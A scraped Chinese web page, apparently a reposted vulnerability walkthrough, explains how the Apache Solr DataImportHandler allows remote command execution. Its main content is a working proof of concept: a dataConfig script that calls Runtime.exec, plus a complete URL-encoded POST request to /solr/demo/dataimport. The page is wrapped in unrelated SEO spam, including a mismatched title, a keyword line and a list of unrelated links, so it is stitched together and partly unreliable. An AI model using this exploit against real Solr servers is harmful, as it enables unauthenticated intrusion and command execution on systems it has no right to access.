当前位置: 首页 > news >正文

前端做网站难吗云南网警在线报警

前端做网站难吗,云南网警在线报警,sem公司,郴州市建设局网站节能科Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能&#…

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。

访问`http://your-ip:8983/`即可查看到Apache solr的管理页面,无需登录。

1.首先在页面左侧选择`demo`核心,打开Dataimport面板,开启右侧Debug mode,填入以下POC:

<dataConfig><script><![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");}]]></script><document><entity name="sample"fileName=".*"baseDir="/"processor="FileListEntityProcessor"recursive="false"transformer="script:poc" /></document>
</dataConfig>

2.利用burpsuite发送以下请求包:

POST /solr/demo/dataimport?_=1708782956647&indent=on&wt=json HTTP/1.1
Host: your-ip:8983
Content-Length: 613
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-type: application/x-www-form-urlencoded
Origin: http://your-ip:8983
Referer: http://your-ip:8983/solr/
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Connection: closecommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=demo&dataConfig=%3CdataConfig%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22sample%22%0A++++++++++++fileName%3D%22.*%22%0A++++++++++++baseDir%3D%22%2F%22%0A++++++++++++processor%3D%22FileListEntityProcessor%22%0A++++++++++++recursive%3D%22false%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport

3.命令成功执行

http://www.yayakq.cn/news/319835/

相关文章:

  • 网页制作相关网站wordpress改成自己网站
  • 重庆营销型网站郑州seo博客
  • 广东平台网站建设网站备案有什么坏处
  • 海北州网站建设公司用wordpress二级导航
  • 怎么做淘宝客导购网站推广html网站可以做访问统计吗
  • 免费建立平台网站集美区网站建设
  • 磐安网站建设公司网站建设应走什么会计科目
  • 有色建设网站很多卖假药冒产品用二级域名做网站
  • 外国教程网站有哪些wordpress 编辑index
  • 建设银行境外汇款申请书网站牌子网官网
  • 如何提高景区旅游网站建设网站怎么做架构
  • 合肥做网站费用长沙网站优化外包服务
  • 网站建设终端是什么水果网站源码
  • dedecms企业网站模板购物网站后台订单处理流程
  • 国外免费logo网站html网站成品下载
  • 广州英文网站制作wordpress悬浮联系表
  • 专业商城网站建设多少钱福彩网网站建设方案
  • 回收网站建设谁有永久免费的服务器
  • 网站建设进度表手机微网站怎么制作
  • 杭州招标信息网seowhy教研室
  • 阳江北京网站建设龙泉市建设局网站
  • 网站前置审批类型网站导航规划
  • 做业务 哪个网站比较好域名备案网站服务内容
  • 邯郸专业网站建设建设网站都需要哪些资料
  • 青岛开办公司要做网站吗花都网站建设策划
  • 忠县网站建设html代码中
  • 做网站怎样赚卖流量长链接怎么弄成短链接
  • 岳阳博物馆网站wordpress 取消边栏
  • 衡水制作网站重庆免费建站公司地址
  • 昆明软件开发公司做门户网站的广东省网站集约化建设方案